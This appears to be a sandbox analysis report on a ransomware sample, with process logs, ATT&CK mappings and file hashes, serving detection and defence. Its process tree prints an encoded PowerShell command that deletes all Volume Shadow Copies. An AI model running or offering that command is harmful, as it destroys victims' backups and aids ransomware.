PID 4036 wrote to memory of 5080	4036	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe	85
PID 4036 wrote to memory of 5080	4036	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe	85
PID 4036 wrote to memory of 5080	4036	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe	85
PID 4036 wrote to memory of 2152	4036	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe	90
PID 4036 wrote to memory of 2152	4036	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe	90
PID 5080 wrote to memory of 4664	5080	Kufmxd.exe	95
PID 5080 wrote to memory of 4664	5080	Kufmxd.exe	95
PID 5080 wrote to memory of 4664	5080	Kufmxd.exe	95
PID 988 wrote to memory of 1220	988	chrome.exe	114
PID 988 wrote to memory of 1220	988	chrome.exe	114
PID 988 wrote to memory of 1536	988	chrome.exe	115
PID 988 wrote to memory of 1536	988	chrome.exe	115
PID 988 wrote to memory of 1536	988	chrome.exe	115
PID 988 wrote to memory of 1536	988	chrome.exe	115
PID 988 wrote to memory of 1536	988	chrome.exe	115
PID 988 wrote to memory of 1536	988	chrome.exe	115
PID 988 wrote to memory of 1536	988	chrome.exe	115
PID 988 wrote to memory of 1536	988	chrome.exe	115
PID 988 wrote to memory of 1536	988	chrome.exe	115
PID 988 wrote to memory of 1536	988	chrome.exe	115
PID 988 wrote to memory of 1536	988	chrome.exe	115
PID 988 wrote to memory of 1536	988	chrome.exe	115
PID 988 wrote to memory of 1536	988	chrome.exe	115
PID 988 wrote to memory of 1536	988	chrome.exe	115
PID 988 wrote to memory of 1536	988	chrome.exe	115
PID 988 wrote to memory of 1536	988	chrome.exe	115
PID 988 wrote to memory of 1536	988	chrome.exe	115
PID 988 wrote to memory of 1536	988	chrome.exe	115
PID 988 wrote to memory of 1536	988	chrome.exe	115
PID 988 wrote to memory of 1536	988	chrome.exe	115
PID 988 wrote to memory of 1536	988	chrome.exe	115
PID 988 wrote to memory of 1536	988	chrome.exe	115
PID 988 wrote to memory of 1536	988	chrome.exe	115
PID 988 wrote to memory of 1536	988	chrome.exe	115
PID 988 wrote to memory of 1536	988	chrome.exe	115
PID 988 wrote to memory of 1536	988	chrome.exe	115
PID 988 wrote to memory of 1536	988	chrome.exe	115
PID 988 wrote to memory of 1536	988	chrome.exe	115
PID 988 wrote to memory of 1536	988	chrome.exe	115
PID 988 wrote to memory of 1536	988	chrome.exe	115
PID 988 wrote to memory of 1528	988	chrome.exe	116
PID 988 wrote to memory of 1528	988	chrome.exe	116
PID 988 wrote to memory of 2536	988	chrome.exe	117
PID 988 wrote to memory of 2536	988	chrome.exe	117
PID 988 wrote to memory of 2536	988	chrome.exe	117
PID 988 wrote to memory of 2536	988	chrome.exe	117
PID 988 wrote to memory of 2536	988	chrome.exe	117
PID 988 wrote to memory of 2536	988	chrome.exe	117
PID 988 wrote to memory of 2536	988	chrome.exe	117
PID 988 wrote to memory of 2536	988	chrome.exe	117
PID 988 wrote to memory of 2536	988	chrome.exe	117
PID 988 wrote to memory of 2536	988	chrome.exe	117
PID 988 wrote to memory of 2536	988	chrome.exe	117
PID 988 wrote to memory of 2536	988	chrome.exe	117
PID 988 wrote to memory of 2536	988	chrome.exe	117
PID 988 wrote to memory of 2536	988	chrome.exe	117
PID 988 wrote to memory of 2536	988	chrome.exe	117
PID 988 wrote to memory of 2536	988	chrome.exe	117
PID 988 wrote to memory of 2536	988	chrome.exe	117
PID 988 wrote to memory of 2536	988	chrome.exe	117
PID 988 wrote to memory of 2536	988	chrome.exe	117
PID 988 wrote to memory of 2536	988	chrome.exe	117
PID 988 wrote to memory of 2536	988	chrome.exe	117
PID 988 wrote to memory of 2536	988	chrome.exe	117

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe
"C:\Users\Admin\AppData\Local\Temp\ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe"
1⤵
- Adds Run key to start application
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4036
- C:\Users\Admin\AppData\Local\Temp\Kufmxd.exe
  C:\Users\Admin\AppData\Local\Temp\Kufmxd.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:5080
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\734a598e.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4664
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2152

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:552

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2812

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2408

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\8w8kz1-readme.txt
1⤵
- Suspicious use of FindShellTrayWindow
PID:884

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Checks system information in the registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:988
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffadba9cc40,0x7ffadba9cc4c,0x7ffadba9cc58
  2⤵
  - Executes dropped EXE
  PID:1220
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1884,i,8670522896778159017,6414350830840085157,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=1880 /prefetch:2
  2⤵
  - Executes dropped EXE
  PID:1536
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2152,i,8670522896778159017,6414350830840085157,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=2164 /prefetch:3
  2⤵
  - Executes dropped EXE
  PID:1528
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2288,i,8670522896778159017,6414350830840085157,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=2248 /prefetch:8
  2⤵
  - Executes dropped EXE
  PID:2536
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3172,i,8670522896778159017,6414350830840085157,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3192 /prefetch:1
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:4984
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3228,i,8670522896778159017,6414350830840085157,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3216 /prefetch:1
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:2020
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4560,i,8670522896778159017,6414350830840085157,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=4568 /prefetch:1
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:4560
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4916,i,8670522896778159017,6414350830840085157,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=4920 /prefetch:8
  2⤵
  - Executes dropped EXE
  PID:548
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5072,i,8670522896778159017,6414350830840085157,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=5100 /prefetch:8
  2⤵
  - Executes dropped EXE
  PID:4892
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4424,i,8670522896778159017,6414350830840085157,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=4476 /prefetch:1
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:2976
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=4632,i,8670522896778159017,6414350830840085157,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=4596 /prefetch:1
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:2352
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=3736,i,8670522896778159017,6414350830840085157,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3168 /prefetch:1
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:2768
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5188,i,8670522896778159017,6414350830840085157,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=4612 /prefetch:1
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:304
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4776,i,8670522896778159017,6414350830840085157,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=5260 /prefetch:1
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:3924

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"
1⤵
- Executes dropped EXE
PID:1524

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:1972

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe

Filesize
1.6MB

MD5
2c99645742665024db8e389c2870bcb9

SHA1
6e556ee19a2a1731ac56b69d0e83257e439a818f

SHA256
ab708ef464fa5e8222459d786512279840efa919b05e66b0f2c473d8db4becee

SHA512
25a7f8434e83341d9f8d68e2f8c7f088f2e84a707fc6db3f18bc1c098a2511380f92d8efde768f5113bc52734f640a08ba356f9a31d551da6ddf58d4884170a5

Download Submit
C:\Program Files\Google\Chrome\Application\chrome.exe

Filesize
2.6MB

MD5
c0e615c4c4f31cc9d9c8e1f7db1fd19e

SHA1
e561a25b4d70209d6f9a98fc6755b7bcbebbfad1

SHA256
bcbb6c63044144a41ced7051ddcd55e60439c72d2de9a230a4c5d5696ba5601d

SHA512
f345c22444c7e3e67fcf4d604b750a44a849881f173e1912ffc5526fc21c3ed9c03aa68a7f3f0c01f6793588fd183319824871fc9d118e4af03ee77a87ca2ae3

Download Submit
C:\Users\8w8kz1-readme.txt

Filesize
6KB

MD5
f1ae83c76c9143ca1d362bff0f9bf955

SHA1
1c308093eb3f7029888ca404fc63f1881ca49334

SHA256
67726de383b3e95017cd1a974eebe0670486ee3f1491f61d4aebff17ba11755c

SHA512
878753d0e9c726885b87c2a6f11dc66740e67aa2d2c645804db162fcdfe564d52063254273fd06551960839fd5387f2feb9ca7514c10d1aa494cb1f498bc2b67

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
134734f5f9b3b5096a7adc8a2e369f53

SHA1
174c769fa2ec588433d9239d0b306ff6023b9313

SHA256
e0b0e445d1c6f8379dae5c5c445862d3206338f8c3b19fc542c0fbbabc0e08f2

SHA512
900a4215b31ebdfdeda0aac10b2314b23e38e42411e1dace8ab7edc2c2d03539ee04e0874194714762d8c3b5e3c20052804fc0e12dca4158e134b2d1144ff487

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000002

Filesize
210KB

MD5
5ac828ee8e3812a5b225161caf6c61da

SHA1
86e65f22356c55c21147ce97903f5dbdf363649f

SHA256
b70465f707e42b41529b4e6d592f136d9eb307c39d040d147ad3c42842b723e7

SHA512
87472912277ae0201c2a41edc228720809b8a94599c54b06a9c509ff3b4a616fcdd10484b679fa0d436e472a8fc062f4b9cf7f4fa274dde6d10f77d378c06aa6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
042172c14cea8bfe827d8fe5b225b9c5

SHA1
dacefb1dd9626a7eda7cfee0bedb3ba78774cec5

SHA256
3c59897f22e86f79a54df2bb4ebb24efee43c31945d8785fd01f73bbbbda0688

SHA512
a4426b08e6e67fb5161bfc5a77e8b2b66f072021b92a526d822eacf8e7d978d022a04c3db2741aec1e4faa6aee7bc4e8fa679badc93b64364107c2e9e7683499

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
db1da652bac522f8487e3689897e72e3

SHA1
6f08e8045a393f79d56a5732dd92671ab3d12737

SHA256
65423c03de6d05ee299ff6aa3518c9d0ece2a3a138f8f59ef9504fc0dfb949dd

SHA512
427cb00bc195520c9b6599212f07dfe3a082907d975209157ab5f5f9967099db6dd3e122ba763d960b6a451e63fa35b325250cf300289e765c6be98c4e98ef35

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
bbd2be78aeafb84bebfa42c79c6e314e

SHA1
17081fc2d3b0f82ae473dc95c76478305edddc83

SHA256
07054de9f60e44803456287fe1c94f292bb60db0e95830923690c9f0bb984d0f

SHA512
9a754805c705f456ca1224f2c101aee9aeff8d6446cc53ebbcbc353ed89635d7f4170b416abe778f237b95f87b9e749cd81b39907c7adc2f9f77b40ded08fc00

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
2a71bb66848bade96c5d0e734d8dab4c

SHA1
80308647f653f931e6b01bf4ef097a103d1f8dc0

SHA256
f427dd47bf21021082d668c5b96d982967a80382746ae92fa3638788fa3ba840

SHA512
b1733ebafc8dc5ffbd888ba00b9aa278996e8258984595d7ae883b309b5dbf0f1775db5af29ce27e8b7fafbd2c5b76f45040d4066b732562ff1915b849851262

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
3c28d1cf52a5caa3274d9c3265393fba

SHA1
86a5eab55508ebb4701922effe981998c3187656

SHA256
821dffd6d6fbdc2568e5ca50bd4d7f9cf99a3da8bb236acc18e5780a1cb549f1

SHA512
a483f2a89206b10d2a20d3f94afc2b21263bf7a96688f4bb817537467f9700e6ac44ed4a1b9677dabd5f767accd5c42614a56d00987fd7392aa9d9777dae6699

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
189KB

MD5
80b0814809586e4e09e63a9e7d3873be

SHA1
b8069f8f4e21cc920ef857058aba0006c555c5de

SHA256
b15153e2b2aadf90cfc45d1290b36f90c6409a1bd3a609667bb46ad6adadd5d7

SHA512
870941a20eb2450d1d83cd85766aac0ff1877fb224d8027121e1b5996651c76a2431887f49cb3a229c2891d3b30d9b5736f4489166099e47a5a39f0df16c041b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
189KB

MD5
1bf52ea4818231aa8ea45da8e5dca7b1

SHA1
bc7db7d9153dc4eda90054d07272faf3a14ec7b1

SHA256
b1cfb134c41b00fb438f76d74844cc8d5907814776eb9f8f2c8c629929ef5b98

SHA512
5d24408edff49ba57020eeca805f195f49aa50722d1b33c56a1b7d3b39125006e5c0ed582ca0eda5c1e26a1ba1747309a6bd9e2fefac25b45351f243347107a0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\A4F1OTIC\k2[1].rar

Filesize
4B

MD5
d3b07384d113edec49eaa6238ad5ff00

SHA1
f1d2d2f924e986ac86fdf7b36c94bcdf32beec15

SHA256
b5bb9d8014a0f9b1d61e21e796d78dccdf1352f23cd32812f4850b878ae4944c

SHA512
0cf9180a764aba863a67b6d72f0918bc131c6772642cb2dce5a34f0a702f9470ddc2bf125c12198b1995c233c34b4afd346c54a2334c350a948a51b6e8b4e6b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\27385727.exe

Filesize
4B

MD5
20879c987e2f9a916e578386d499f629

SHA1
c7b33ddcc42361fdb847036fc07e880b81935d5d

SHA256
9f2981a7cc4d40a2a409dc895de64253acd819d7c0011c8e80b86fe899464e31

SHA512
bcdde1625364dd6dd143b45bdcec8d59cf8982aff33790d390b839f3869e0e815684568b14b555a596d616252aeeaa98dac2e6e551c9095ea11a575ff25ff84f

Download Submit
C:\Users\Admin\AppData\Local\Temp\734a598e.bat

Filesize
187B

MD5
b6dc6cd866a8574de90d6806f3f561cd

SHA1
bfc07098a59edfc2878c11f4acfcf990bf21a239

SHA256
951ae600466aa44e40e58d0d7f1621a2a3feb45ca6d4ddd5b34af6f0155414ff

SHA512
41e2b1f5c701b3643fa25221515c18a56854c7e43254d7a96e5cf7c5d6015bc7aa892e212af9bf59d668cceae6a1e7613088c99b8467057dd7dcfc8232cadd85

Download Submit
C:\Users\Admin\AppData\Local\Temp\Kufmxd.exe

Filesize
15KB

MD5
f7d21de5c4e81341eccd280c11ddcc9a

SHA1
d4e9ef10d7685d491583c6fa93ae5d9105d815bd

SHA256
4485df22c627fa0bb899d79aa6ff29bc5be1dbc3caa2b7a490809338d54b7794

SHA512
e4553b86b083996038bacfb979ad0b86f578f95185d8efac34a77f6cc73e491d4f70e1449bbc9eb1d62f430800c1574101b270e1cb0eeed43a83049a79b636a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wdznjrbn.zbu.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2152-61-0x00007FFADC2E0000-0x00007FFADCDA1000-memory.dmp

Filesize
10.8MB

Download
memory/2152-44-0x0000029C60B50000-0x0000029C60B72000-memory.dmp

Filesize
136KB

Download
memory/2152-43-0x00007FFADC2E0000-0x00007FFADCDA1000-memory.dmp

Filesize
10.8MB

Download
memory/2152-42-0x00007FFADC2E3000-0x00007FFADC2E5000-memory.dmp

Filesize
8KB

Download
memory/4036-501-0x0000000000E40000-0x0000000000E67000-memory.dmp

Filesize
156KB

Download
memory/4036-0-0x0000000000E40000-0x0000000000E67000-memory.dmp

Filesize
156KB

Download
memory/5080-57-0x0000000000FD0000-0x0000000000FD9000-memory.dmp

Filesize
36KB

Download
memory/5080-5-0x0000000000FD0000-0x0000000000FD9000-memory.dmp

Filesize
36KB

Download